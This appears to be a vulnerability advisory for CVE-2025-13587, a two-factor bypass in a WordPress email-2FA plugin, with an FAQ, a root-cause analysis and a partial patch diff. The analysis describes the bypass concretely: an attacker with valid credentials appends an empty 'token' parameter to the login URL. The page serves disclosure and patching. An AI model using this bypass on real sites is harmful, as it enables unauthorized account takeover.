What is CVE-2025-13587?

CVE-2025-13587 is a vulnerability in the Two Factor (2FA) Authentication via Email plugin for WordPress, affecting versions up to and including 1.9.8. It allows attackers to bypass two-factor authentication by manipulating the ‘token’ HTTP GET parameter during login.

How does the vulnerability work?

The vulnerability exists because the plugin does not validate the contents of the ‘token’ parameter. An attacker can supply any value, including an empty string, to bypass the 2FA requirement, allowing unauthorized access to user accounts.

Who is affected by this vulnerability?

Any WordPress site using the Two Factor (2FA) Authentication via Email plugin version 1.9.8 or earlier is affected. Administrators should check their plugin version to determine if they are vulnerable.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Two Factor (2FA) Authentication via Email plugin installed on your WordPress site. If it is version 1.9.8 or earlier, your site is at risk.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Two Factor (2FA) Authentication via Email plugin to version 1.9.9 or later, where the issue has been patched. Regularly check for updates to ensure ongoing security.

What does the CVSS score of 6.5 mean?

A CVSS score of 6.5 indicates a medium severity vulnerability. This means it poses a moderate risk to systems, and while it may not be critical, it should be addressed promptly to prevent potential exploitation.

What practical risks does this vulnerability pose?

Exploitation of this vulnerability allows attackers to bypass two-factor authentication, leading to unauthorized access to user accounts. This can result in privilege escalation, data exposure, and potential site compromise.

What changes were made in the patched version?

In version 1.9.9, the plugin was updated to enforce validation of the ‘token’ parameter, ensuring it is not only present but also not empty. This strengthens the security of the authentication process.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can use valid credentials along with an empty ‘token’ parameter to log in without completing the two-factor authentication process. This illustrates the ease of exploiting the vulnerability.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the plugin until it can be updated. Additionally, monitor user accounts for suspicious activity and implement other security measures to protect your site.

Are there any additional security measures I should consider?

In addition to updating the plugin, consider implementing other security practices such as using strong passwords, enabling logging and monitoring, and employing a web application firewall to further protect your WordPress site.

Where can I find more information about this vulnerability?

For more information about CVE-2025-13587, you can refer to the official CVE database, security advisories from the plugin developers, and trusted security blogs that cover WordPress vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-13587: Two Factor (2FA) Authentication via Email <= 1.9.8 – Two-Factor Authentication Bypass via token (two-factor-2fa-via-email)

CVE ID CVE-2025-13587

Plugin two-factor-2fa-via-email

Severity Medium (CVSS 6.5)

CWE 20

Vulnerable Version 1.9.8

Patched Version 1.9.9

Disclosed February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13587:
The Two Factor (2FA) Authentication via Email WordPress plugin contains a critical authentication bypass vulnerability in versions up to 1.9.8. The vulnerability allows attackers to bypass two-factor authentication by supplying any value, including an empty string, in the ‘token’ HTTP GET parameter during login. This flaw completely defeats the plugin’s 2FA protection mechanism.

Atomic Edge research identifies the root cause in the SS88_2FAVE::wp_login() method within the main plugin file. The vulnerable code at line 219 of ss88-two-factor-via-email.php only enforces 2FA requirements when the ‘token’ GET parameter is undefined. The condition ‘if(!isset($_GET[“token”]))’ fails to validate whether the token parameter contains a legitimate value. An attacker can bypass this check by providing any value, including an empty string, causing the method to skip the 2FA verification process entirely.

The exploitation method involves a simple HTTP GET request manipulation. After obtaining valid WordPress credentials through credential stuffing, phishing, or other means, an attacker appends ‘?token=’ to the standard WordPress login URL. The attack vector targets the standard WordPress wp-login.php endpoint where the plugin’s authentication hook operates. No special endpoints or AJAX handlers are required. The payload consists of the ‘token’ parameter with any value, including an empty string, which triggers the bypass condition.

Atomic Edge analysis of the patch reveals the fix modifies two critical locations. In the processTokenLogin() method at line 132, the condition changes from ‘if(!isset($_GET[“token”])) return;’ to ‘if(!isset($_GET[“token”]) || $_GET[“token”] === “”) return;’. The wp_login() method at line 219 receives identical hardening: ‘if(!isset($_GET[“token”]) || $_GET[“token”] === “”)’. These changes ensure the plugin properly validates both the presence and non-empty value of the token parameter before proceeding with authentication. The patch also includes security hardening through additional output escaping functions like esc_html_e() and esc_url() throughout the codebase.

Successful exploitation allows complete bypass of two-factor authentication for any user account protected by the plugin. Attackers gain unauthorized access to WordPress administrator or user accounts without requiring the legitimate second factor. This leads to privilege escalation, data exposure, and potential site compromise. The vulnerability undermines the core security promise of two-factor authentication, reducing protection to single-factor authentication only.

Differential between vulnerable and patched code

Code Diff

--- a/two-factor-2fa-via-email/assets/html/2fa-page.php
+++ b/two-factor-2fa-via-email/assets/html/2fa-page.php
@@ -3,7 +3,7 @@
 <head>
 	<meta http-equiv="X-UA-Compatible" content="IE=edge">
 	<meta charset="utf-8">
-	<title><?php _e('Account Protected by 2FA via Email', 'two-factor-2fa-via-email'); ?></title>
+	<title><?php esc_html_e('Account Protected by 2FA via Email', 'two-factor-2fa-via-email'); ?></title>
 	<meta name="viewport" content="width=device-width, initial-scale=1">
 	<meta name="robots" CONTENT="noindex, nofollow">
 	<link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABYCAMAAAA0hKKwAAAAflBMVEVHcEz/////////////////////////////////////////////////////////////////////////////////////////////////////AHj/C33/AHP/AG//GYb/4vD/TqL/l8n/yuT/Opf/udr/8fj/Z6//rdT/ebj/AGwXRMjbAAAAGXRSTlMA92/jE08Ht5/t2l4ekyuCN0KstMvFwNDHalugRAAABEZJREFUaN7tWtmSqjAQDatACCCICgnIJjr//4MXREeWbLg83Ko55ZN0cugl6e4EAGgwPUP1rc0Nlg+3LlVo60eOrTkd9tEmRKrhmUAS+tYPD5qdjGA7saVu9bGUC9FuItNB0Q6hb+hiBhh2Q5WEBjv2t8Oren5MF+mH2huVy6P7WsKHZhmuhxSBlG15TA7VTiSgSAkhqhuBd0w+CRtSOAwl+TCsRazB5PPYzwLASL6B40QXT/kKSRKO1+4u+RLUUewmX8PvgnHt75FEDxI/+SKCu0fsb5JYoiVyPp9OJ+E05x7slT8slpD6sLkWeYc0z4trw2Q6lW3di+G8LsqKKmIwrdXUJCNp2v1Skv0QXFyXM5ybtk6zjPRISSeW1hXLXgHlQUmydIJurry9nMcqFHmWzaVISVn2jB2lIb0KeDoDybK8uNwMV5UFJjeZGQip6E6hkNSU8XceXJRljX8yukCa1cvZXCrJCadsZAsj3fAYgpcxsqWSNNnCWJg1L549JA01vJYkFzKaBz8m4an3FMgusiRZ+jKILEkleFuKsZ7/n+gkCjW68NJAT7MxTUeKRNLxI6c8JxW6ZJCo6CmFlt7bjBNVi6gdxTdlxSs6q4YoSCrjmBkTjSM5sPaukS7TCTFHQ4IvzIRi0uvfEpPJlFhgMEIKekKAvOx7amnbJEsZUl8YVfGQtDxWRmqKlEjFFEmLRlR6RczcWT1opitupgRuK3Zy3t5JAk4Cr1pMuMYi+MorA/a/xV3IrRPKnG61QbvrSaYikqjuOudQPU5SnqF6oDVFfVNT1g2pBRTJYVLWi4vI63yTJHkp7LZmraMlZGnyqWeuwrJP2c5bLTHLuR0XDFWyngMAlEgq09mKtGdxZxpQO+xEQpmbyUgpFt3Re2xgaOKxl35tXsRyyGSds+ihePSpxmJ3aAbv4MNwJGjEaggOcXT/7ZZoH4iPolz0Vr99gHInXt7rNI4KpOG+ZjQHmmANXF9bb6h1FLcQUJ01FEcIXoIpT+O8SDHQSPnGVsFbcCX2TcsF7yLYvXAOuN5mXGUcD3wGnISmuR/iADrT/UoAPgZfpuR5F57wYO4TvmfsMQ74JBhhvPv/SFjmktx3kbXVv+l4F1oI7G+XIuaLIewLtiR1b/c9yuZ++cLTx2WmY4Wz4AP/MAht7iTDJQ+Dx+WkFcdlXIyh56ARSb+hRirlgo1fWGqQ5obJkCnJ7dUiH3qu+XsXqAovC+LRm+keRLu5cZckg6mdOLQsK4wlqwlt34tb0VGjXXkxSD6LP5I/Eul6FH2fJNZX37NtQPzCXauxrrGIwara/VEtutGKQZq6qkUY3X9D2fZF84e93YSRRP+mWMG0fZGhOYy/MnDViGtn5aguEocJN/x3c9DidEUPVBQ72nycovWbPyMB6gbaOPaCSrGdPYLMbz/0AP5+S9J/ToJUIzBFX4dAH4Wb8RgYTHPsPxIzdm/MInasAAAAAElFTkSuQmCC" />
@@ -31,10 +31,10 @@
         }
     </style>
 	<script>
-		let txt_m = '<?php _e('minute', 'two-factor-2fa-via-email'); ?>';
-		let txt_ms = '<?php _e('minutes', 'two-factor-2fa-via-email'); ?>';
-		let txt_s = '<?php _e('second', 'two-factor-2fa-via-email'); ?>';
-		let txt_ss = '<?php _e('seconds', 'two-factor-2fa-via-email'); ?>';
+		let txt_m = '<?php esc_html_e('minute', 'two-factor-2fa-via-email'); ?>';
+		let txt_ms = '<?php esc_html_e('minutes', 'two-factor-2fa-via-email'); ?>';
+		let txt_s = '<?php esc_html_e('second', 'two-factor-2fa-via-email'); ?>';
+		let txt_ss = '<?php esc_html_e('seconds', 'two-factor-2fa-via-email'); ?>';

 		document.addEventListener('DOMContentLoaded', function(){

@@ -58,7 +58,7 @@

 					if(minutes == 0 && seconds == 0) {

-						document.querySelector('#timertext').innerHTML = '<?php _e('The link has expired. Please login again.', 'two-factor-2fa-via-email'); ?>';
+						document.querySelector('#timertext').innerHTML = '<?php esc_html_e('The link has expired. Please login again.', 'two-factor-2fa-via-email'); ?>';
 						return;

 					}
@@ -80,13 +80,13 @@

 		function checkUserLoggedIn() {

-			fetch('<?php echo admin_url('admin-ajax.php'); ?>', {
+			fetch('<?php echo esc_url(admin_url('admin-ajax.php')); ?>', {
 				method: 'POST',
 				headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
 				body: 'action=ss882fave_is_user_logged_in'
 			})
 			.then(response => response.json())
-			.then(data => { if(data.logged_in) window.location = '<?php echo get_site_url(); ?>'; })
+			.then(data => { if(data.logged_in) window.location = '<?php echo esc_url(get_site_url()); ?>'; })
 			.catch(console.error);

 		}
@@ -102,7 +102,6 @@
 					<article>
 						<img src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48c3ZnIHhtbDpzcGFjZT0icHJlc2VydmUiIHZpZXdCb3g9IjAgMCAxMDAgMTAwIiB5PSIwIiB4PSIwIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGlkPSLlnJblsaRfMSIgdmVyc2lvbj0iMS4xIiB3aWR0aD0iMjAwcHgiIGhlaWdodD0iMjAwcHgiIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiBzdHlsZT0id2lkdGg6MTAwJTtoZWlnaHQ6MTAwJTtiYWNrZ3JvdW5kLXNpemU6aW5pdGlhbDtiYWNrZ3JvdW5kLXJlcGVhdC15OmluaXRpYWw7YmFja2dyb3VuZC1yZXBlYXQteDppbml0aWFsO2JhY2tncm91bmQtcG9zaXRpb24teTppbml0aWFsO2JhY2tncm91bmQtcG9zaXRpb24teDppbml0aWFsO2JhY2tncm91bmQtb3JpZ2luOmluaXRpYWw7YmFja2dyb3VuZC1jb2xvcjppbml0aWFsO2JhY2tncm91bmQtY2xpcDppbml0aWFsO2JhY2tncm91bmQtYXR0YWNobWVudDppbml0aWFsO2FuaW1hdGlvbi1wbGF5LXN0YXRlOnBhdXNlZCIgPjxnIGNsYXNzPSJsZGwtc2NhbGUiIHN0eWxlPSJ0cmFuc2Zvcm0tb3JpZ2luOjUwJSA1MCU7dHJhbnNmb3JtOnJvdGF0ZSgwZGVnKSBzY2FsZSgwLjgsIDAuOCk7YW5pbWF0aW9uLXBsYXktc3RhdGU6cGF1c2VkIiA+PGcgc3R5bGU9ImFuaW1hdGlvbi1wbGF5LXN0YXRlOnBhdXNlZCIgPjxwYXRoIGZpbGw9IiMzMzMiIGQ9Ik02NS44NzcgNTcuNTAzYTQuMjM0IDQuMjM0IDAgMCAxLTQuMjM0LTQuMjM0VjI2LjEwMmMwLTQuNjY5LTMuNzk5LTguNDY4LTguNDY4LTguNDY4aC02LjM1MmMtNC42NjkgMC04LjQ2OCAzLjc5OS04LjQ2OCA4LjQ2OFY1My4yN2E0LjIzNCA0LjIzNCAwIDEgMS04LjQ2OCAwVjI2LjEwMmMwLTkuMzM4IDcuNTk3LTE2LjkzNSAxNi45MzUtMTYuOTM1aDYuMzUyYzkuMzM4IDAgMTYuOTM1IDcuNTk3IDE2LjkzNSAxNi45MzVWNTMuMjdhNC4yMyA0LjIzIDAgMCAxLTQuMjMyIDQuMjMzeiIgc3R5bGU9ImZpbGw6cmdiKDUxLCA1MSwgNTEpO2FuaW1hdGlvbi1wbGF5LXN0YXRlOnBhdXNlZCIgPjwvcGF0aD48L2c+CjxwYXRoIGZpbGw9IiNmOGIyNmEiIGQ9Ik03MS44NzUgODcuNTYzaC00My43NWE5LjU4NCA5LjU4NCAwIDAgMS05LjU4NC05LjU4NFY0My4yMThhOS41ODQgOS41ODQgMCAwIDEgOS41ODQtOS41ODRoNDMuNzQ5YTkuNTg0IDkuNTg0IDAgMCAxIDkuNTg0IDkuNTg0djM0Ljc2MWMuMDAxIDUuMjkzLTQuMjkgOS41ODQtOS41ODMgOS41ODR6IiBzdHlsZT0iZmlsbDpyZ2IoMjQ4LCAxNzgsIDEwNik7YW5pbWF0aW9uLXBsYXktc3RhdGU6cGF1c2VkIiA+PC9wYXRoPgo8bWV0YWRhdGEgeG1sbnM6ZD0iaHR0cHM6Ly9sb2FkaW5nLmlvL3N0b2NrLyIgc3R5bGU9ImFuaW1hdGlvbi1wbGF5LXN0YXRlOnBhdXNlZCIgPjxkOm5hbWUgc3R5bGU9ImFuaW1hdGlvbi1wbGF5LXN0YXRlOnBhdXNlZCIgPmxvY2s8L2Q6bmFtZT4KPGQ6dGFncyBzdHlsZT0iYW5pbWF0aW9uLXBsYXktc3RhdGU6cGF1c2VkIiA+bG9jayxzZWN1cmUscHJpdmF0ZSxzZWN1cml0eSxndWFyZCxodHRwcyxzc2wsZW5jcnlwdCxwcm90ZWN0LGxvY2tzbWl0aDwvZDp0YWdzPgo8ZDpsaWNlbnNlIHN0eWxlPSJhbmltYXRpb24tcGxheS1zdGF0ZTpwYXVzZWQiID5ieTwvZDpsaWNlbnNlPgo8ZDpzbHVnIHN0eWxlPSJhbmltYXRpb24tcGxheS1zdGF0ZTpwYXVzZWQiID51ZDM5eDwvZDpzbHVnPjwvbWV0YWRhdGE+PC9nPjwhLS0gZ2VuZXJhdGVkIGJ5IGh0dHBzOi8vbG9hZGluZy5pby8gLS0+PC9zdmc+" alt="Padlock Icon" style="background-color: white;border-radius: 50%;padding:20px;" />
                         <?php echo wp_kses_post($HTML); ?>
-						<p><a href="https://ss88.us/plugins/two-factor-2fa-authentication-via-email-plugin-for-wordpress" target="_blank"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABYCAMAAAA0hKKwAAAAflBMVEVHcEz/////////////////////////////////////////////////////////////////////////////////////////////////////AHj/C33/AHP/AG//GYb/4vD/TqL/l8n/yuT/Opf/udr/8fj/Z6//rdT/ebj/AGwXRMjbAAAAGXRSTlMA92/jE08Ht5/t2l4ekyuCN0KstMvFwNDHalugRAAABEZJREFUaN7tWtmSqjAQDatACCCICgnIJjr//4MXREeWbLg83Ko55ZN0cugl6e4EAGgwPUP1rc0Nlg+3LlVo60eOrTkd9tEmRKrhmUAS+tYPD5qdjGA7saVu9bGUC9FuItNB0Q6hb+hiBhh2Q5WEBjv2t8Oren5MF+mH2huVy6P7WsKHZhmuhxSBlG15TA7VTiSgSAkhqhuBd0w+CRtSOAwl+TCsRazB5PPYzwLASL6B40QXT/kKSRKO1+4u+RLUUewmX8PvgnHt75FEDxI/+SKCu0fsb5JYoiVyPp9OJ+E05x7slT8slpD6sLkWeYc0z4trw2Q6lW3di+G8LsqKKmIwrdXUJCNp2v1Skv0QXFyXM5ybtk6zjPRISSeW1hXLXgHlQUmydIJurry9nMcqFHmWzaVISVn2jB2lIb0KeDoDybK8uNwMV5UFJjeZGQip6E6hkNSU8XceXJRljX8yukCa1cvZXCrJCadsZAsj3fAYgpcxsqWSNNnCWJg1L549JA01vJYkFzKaBz8m4an3FMgusiRZ+jKILEkleFuKsZ7/n+gkCjW68NJAT7MxTUeKRNLxI6c8JxW6ZJCo6CmFlt7bjBNVi6gdxTdlxSs6q4YoSCrjmBkTjSM5sPaukS7TCTFHQ4IvzIRi0uvfEpPJlFhgMEIKekKAvOx7amnbJEsZUl8YVfGQtDxWRmqKlEjFFEmLRlR6RczcWT1opitupgRuK3Zy3t5JAk4Cr1pMuMYi+MorA/a/xV3IrRPKnG61QbvrSaYikqjuOudQPU5SnqF6oDVFfVNT1g2pBRTJYVLWi4vI63yTJHkp7LZmraMlZGnyqWeuwrJP2c5bLTHLuR0XDFWyngMAlEgq09mKtGdxZxpQO+xEQpmbyUgpFt3Re2xgaOKxl35tXsRyyGSds+ihePSpxmJ3aAbv4MNwJGjEaggOcXT/7ZZoH4iPolz0Vr99gHInXt7rNI4KpOG+ZjQHmmANXF9bb6h1FLcQUJ01FEcIXoIpT+O8SDHQSPnGVsFbcCX2TcsF7yLYvXAOuN5mXGUcD3wGnISmuR/iADrT/UoAPgZfpuR5F57wYO4TvmfsMQ74JBhhvPv/SFjmktx3kbXVv+l4F1oI7G+XIuaLIewLtiR1b/c9yuZ++cLTx2WmY4Wz4AP/MAht7iTDJQ+Dx+WkFcdlXIyh56ARSb+hRirlgo1fWGqQ5obJkCnJ7dUiH3qu+XsXqAovC+LRm+keRLu5cZckg6mdOLQsK4wlqwlt34tb0VGjXXkxSD6LP5I/Eul6FH2fJNZX37NtQPzCXauxrrGIwara/VEtutGKQZq6qkUY3X9D2fZF84e93YSRRP+mWMG0fZGhOYy/MnDViGtn5aguEocJN/x3c9DidEUPVBQ72nycovWbPyMB6gbaOPaCSrGdPYLMbz/0AP5+S9J/ToJUIzBFX4dAH4Wb8RgYTHPsPxIzdm/MInasAAAAAElFTkSuQmCC" style="max-width:20px;" alt="SS88 LLC Logo" /></a></p>
 					</article>
 				</div>
 			</div>
--- a/two-factor-2fa-via-email/assets/html/login-email.php
+++ b/two-factor-2fa-via-email/assets/html/login-email.php
@@ -95,14 +95,14 @@
 													<table border="0" cellpadding="0" cellspacing="0" role="presentation" style="vertical-align:top;" width="100%">
 														<tr>
 															<td align="left" style="font-size:0px;padding:10px 25px;word-break:break-word;">
-																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:25px;font-weight:300;line-height:36px;text-align:left;color:#569f59;"><?php _e('Your unique login link', 'two-factor-2fa-via-email'); ?></div>
+																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:25px;font-weight:300;line-height:36px;text-align:left;color:#569f59;"><?php esc_html_e('Your unique login link', 'two-factor-2fa-via-email'); ?></div>
 															</td>
 														</tr>
 														<tr>
 															<td align="left" style="font-size:0px;padding:10px 25px;word-break:break-word;">
 																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:16px;font-weight:300;line-height:21px;text-align:left;color:#001420;">
-                                                                    👋🏼 <?php printf( __('Hi %s', 'two-factor-2fa-via-email'), sanitize_text_field($Tags['name']) ); ?>,<br><br>
-																	<?php echo wp_kses( __('You <em>(or someone else)</em> has attempted to login to your account. The login was <strong>successful</strong> but has been blocked via Two-Factor Authentication.', 'two-factor-2fa-via-email'), ['em' => true, 'strong' => true]); ?><br><br><?php _e('Click the button below to login', 'two-factor-2fa-via-email'); ?>:
+                                                                    👋🏼 <?php printf( esc_html__('Hi %s', 'two-factor-2fa-via-email'), esc_html(sanitize_text_field($Tags['name'])) ); ?>,<br><br>
+																	<?php echo wp_kses( __('You <em>(or someone else)</em> has attempted to login to your account. The login was <strong>successful</strong> but has been blocked via Two-Factor Authentication.', 'two-factor-2fa-via-email'), ['em' => true, 'strong' => true]); ?><br><br><?php esc_html_e('Click the button below to login', 'two-factor-2fa-via-email'); ?>:
                                                                 </div>
 															</td>
 														</tr>
@@ -110,7 +110,7 @@
 															<td align="center" vertical-align="middle" style="font-size:0px;padding:10px 25px;word-break:break-word;">
 																<table border="0" cellpadding="0" cellspacing="0" role="presentation" style="border-collapse:separate;width:200px;line-height:100%;">
 																	<tr>
-																		<td align="center" bgcolor="#ff0078" role="presentation" style="border:none;border-radius:8px;cursor:auto;mso-padding-alt:10px 25px;background:#569f59;" valign="middle"><a href="<?php echo esc_url($Tags['url']); ?>" style="display:inline-block;width:150px;background:#569f59;color:#FFFFFF;font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:16px;font-weight:300;line-height:21px;margin:0;text-decoration:none;text-transform:none;padding:10px 25px;mso-padding-alt:0px;border-radius:8px;" target="_blank"><?php _e('Log Me In', 'two-factor-2fa-via-email'); ?></a></td>
+																		<td align="center" bgcolor="#ff0078" role="presentation" style="border:none;border-radius:8px;cursor:auto;mso-padding-alt:10px 25px;background:#569f59;" valign="middle"><a href="<?php echo esc_url($Tags['url']); ?>" style="display:inline-block;width:150px;background:#569f59;color:#FFFFFF;font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:16px;font-weight:300;line-height:21px;margin:0;text-decoration:none;text-transform:none;padding:10px 25px;mso-padding-alt:0px;border-radius:8px;" target="_blank"><?php esc_html_e('Log Me In', 'two-factor-2fa-via-email'); ?></a></td>
 																	</tr>
 																</table>
 															</td>
@@ -118,7 +118,7 @@
 														<tr>
 															<td align="left" style="font-size:0px;padding:10px 25px;word-break:break-word;padding-top:50px;">
 															<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:12px;font-weight:300;line-height:21px;text-align:left;color:#001420;background:whitesmoke; padding:20px 40px;border-radius:5px;opacity:0.5">
-																<?php printf( __('If the button above does not work, you can also click/copy this link: %s', 'two-factor-2fa-via-email'), esc_url($Tags['url']) ); ?>
+																<?php printf( esc_html__('If the button above does not work, you can also click/copy this link: %s', 'two-factor-2fa-via-email'), esc_url($Tags['url']) ); ?>
 															</div>
 															</td>
 														</tr>
@@ -154,7 +154,7 @@
 														<tr>
 															<td align="center" style="font-size:0px;padding:10px 25px;padding-top:0px;word-break:break-word;">
 																<div style="font-size:20px;margin-bottom:10px;">🦄</div>
-																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:12px;font-weight:300;line-height:16px;text-align:center;color:#5B768C;"><?php _e('This email is automatically generated. Please do not reply.', 'two-factor-2fa-via-email'); ?></div>
+																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:12px;font-weight:300;line-height:16px;text-align:center;color:#5B768C;"><?php esc_html_e('This email is automatically generated. Please do not reply.', 'two-factor-2fa-via-email'); ?></div>
 															</td>
 														</tr>
 													</table>
--- a/two-factor-2fa-via-email/assets/html/plugin-deactivated.php
+++ b/two-factor-2fa-via-email/assets/html/plugin-deactivated.php
@@ -95,14 +95,14 @@
 													<table border="0" cellpadding="0" cellspacing="0" role="presentation" style="vertical-align:top;" width="100%">
 														<tr>
 															<td align="left" style="font-size:0px;padding:10px 25px;word-break:break-word;">
-																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:25px;font-weight:300;line-height:36px;text-align:left;color:#dd5353;"><?php _e('2FA plugin was deactivated!', 'two-factor-2fa-via-email'); ?></div>
+																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:25px;font-weight:300;line-height:36px;text-align:left;color:#dd5353;"><?php esc_html_e('2FA plugin was deactivated!', 'two-factor-2fa-via-email'); ?></div>
 															</td>
 														</tr>
 														<tr>
 															<td align="left" style="font-size:0px;padding:10px 25px;word-break:break-word;">
 																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:16px;font-weight:300;line-height:21px;text-align:left;color:#001420;">
-                                                                    👋🏼 <?php printf( __('Hi %s', 'two-factor-2fa-via-email'), sanitize_text_field($Tags['hello']) ); ?>,<br><br>
-																	<?php printf( wp_kses( __('The plugin <strong>Two Factor (2FA) Authentication via Email</strong> has been deactivated by the user <strong>%1$s</strong> <em>(%2$s)</em>', 'two-factor-2fa-via-email'), ['strong' => true, 'em' => true]) , sanitize_text_field($Tags['username']), sanitize_text_field($Tags['email']) ); ?>
+                                                                    👋🏼 <?php printf( esc_html__('Hi %s', 'two-factor-2fa-via-email'), esc_html(sanitize_text_field($Tags['hello'])) ); ?>,<br><br>
+																	<?php printf( wp_kses( __('The plugin <strong>Two Factor (2FA) Authentication via Email</strong> has been deactivated by the user <strong>%1$s</strong> <em>(%2$s)</em>', 'two-factor-2fa-via-email'), ['strong' => true, 'em' => true]) , esc_html(sanitize_text_field($Tags['username'])), esc_html(sanitize_text_field($Tags['email'])) ); ?>
 																	<br><br><?php echo wp_kses( __('If this was intended you can ignore this email, otherwise please click the button below to activate the plugin <em>immediately</em>.', 'two-factor-2fa-via-email'), ['em' => true]); ?>
                                                                 </div>
 															</td>
@@ -111,7 +111,7 @@
 															<td align="center" vertical-align="middle" style="font-size:0px;padding:10px 25px;word-break:break-word;">
 																<table border="0" cellpadding="0" cellspacing="0" role="presentation" style="border-collapse:separate;width:200px;line-height:100%;">
 																	<tr>
-																		<td align="center" bgcolor="#dd5353" role="presentation" style="border:none;border-radius:8px;cursor:auto;mso-padding-alt:10px 25px;background:#dd5353;" valign="middle"><a href="<?php echo esc_url($Tags['url']); ?>" style="display:inline-block;width:150px;background:#dd5353;color:#FFFFFF;font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:16px;font-weight:300;line-height:21px;margin:0;text-decoration:none;text-transform:none;padding:10px 25px;mso-padding-alt:0px;border-radius:8px;" target="_blank"><?php _e('Activate Plugin', 'two-factor-2fa-via-email'); ?></a></td>
+																		<td align="center" bgcolor="#dd5353" role="presentation" style="border:none;border-radius:8px;cursor:auto;mso-padding-alt:10px 25px;background:#dd5353;" valign="middle"><a href="<?php echo esc_url($Tags['url']); ?>" style="display:inline-block;width:150px;background:#dd5353;color:#FFFFFF;font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:16px;font-weight:300;line-height:21px;margin:0;text-decoration:none;text-transform:none;padding:10px 25px;mso-padding-alt:0px;border-radius:8px;" target="_blank"><?php esc_html_e('Activate Plugin', 'two-factor-2fa-via-email'); ?></a></td>
 																	</tr>
 																</table>
 															</td>
@@ -119,7 +119,7 @@
 														<tr>
 															<td align="left" style="font-size:0px;padding:10px 25px;word-break:break-word;padding-top:50px;">
 															<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:12px;font-weight:300;line-height:21px;text-align:left;color:#001420;background:whitesmoke; padding:20px 40px;border-radius:5px;opacity:0.5">
-																<?php printf( __('If the button above does not work, you can also click/copy this link: %s', 'two-factor-2fa-via-email'), esc_url($Tags['url']) ); ?>
+																<?php printf( esc_url('If the button above does not work, you can also click/copy this link: %s', 'two-factor-2fa-via-email'), esc_url($Tags['url']) ); ?>
 															</div>
 															</td>
 														</tr>
@@ -155,7 +155,7 @@
 														<tr>
 															<td align="center" style="font-size:0px;padding:10px 25px;padding-top:0px;word-break:break-word;">
 																<div style="font-size:20px;margin-bottom:10px;">🦄</div>
-																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:12px;font-weight:300;line-height:16px;text-align:center;color:#5B768C;"><?php _e('This email is automatically generated. Please do not reply.', 'two-factor-2fa-via-email'); ?></div>
+																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:12px;font-weight:300;line-height:16px;text-align:center;color:#5B768C;"><?php esc_html_e('This email is automatically generated. Please do not reply.', 'two-factor-2fa-via-email'); ?></div>
 															</td>
 														</tr>
 													</table>
--- a/two-factor-2fa-via-email/ss88-two-factor-via-email.php
+++ b/two-factor-2fa-via-email/ss88-two-factor-via-email.php
@@ -1,12 +1,13 @@
 <?php
 /*
 Plugin Name: Two Factor (2FA) Authentication via Email
-Plugin URI: https://ss88.us/plugins/two-factor-2fa-authentication-via-email-plugin-for-wordpress
+Plugin URI: https://neoboffin.com/plugins/two-factor-2fa-authentication-via-email-plugin-for-wordpress
 Description: A lightweight plugin to allow the use of two-factor authentication (2FA) through email. One-click login with this Two-Factor (2FA) Authentication plugin for WordPress.
-Version: 1.9.8
-Author: SS88 LLC
-Author URI: https://ss88.us
+Version: 1.9.9
+Author: Neoboffin LLC
+Author URI: https://neoboffin.com
 Text Domain: two-factor-2fa-via-email
+License: GPL2
 */

 class SS88_2FAVE {
@@ -104,24 +105,24 @@
         $class = 'notice notice-error is-dismissible SS88_2FAVE';
         $message = '<div style="display:flex;gap:20px;">
                         <svg style="min-width:50px;" xmlns="http://www.w3.org/2000/svg" width="31.458" height="39.198" viewBox="0 0 31.458 39.198"><g id="download" transform="translate(-18.541 -9.167)"><g id="Group_1" data-name="Group 1" transform="translate(18.541 9.167)"><path id="Path_2" data-name="Path 2" d="M47.882,33.335a2.117,2.117,0,0,1-2.117-2.117V17.634A4.239,4.239,0,0,0,41.531,13.4H38.355a4.239,4.239,0,0,0-4.234,4.234V31.218a2.117,2.117,0,1,1-4.234,0V17.634a8.477,8.477,0,0,1,8.467-8.467H41.53A8.477,8.477,0,0,1,50,17.634V31.218a2.115,2.115,0,0,1-2.116,2.116Z" transform="translate(-24.214 -9.167)" fill="#333"/><path id="Path_3" data-name="Path 3" d="M45.208,60.6H23.333a4.792,4.792,0,0,1-4.792-4.792V38.426a4.792,4.792,0,0,1,4.792-4.792H45.207A4.792,4.792,0,0,1,50,38.426V55.806A4.791,4.791,0,0,1,45.208,60.6Z" transform="translate(-18.541 -21.401)" fill="#f8b26a"/></g></g></svg>
-                        <div><strong>Two Factor (2FA) Authentication via Email</strong><br>' . __('We have not detected a plugin installed that will handle your emails via SMTP. Please note, if you enable our plugin for a user you must make sure that your WordPress website sends emails correctly, otherwise the user will be locked out until email sending works on your website.', 'two-factor-2fa-via-email') . '</div>
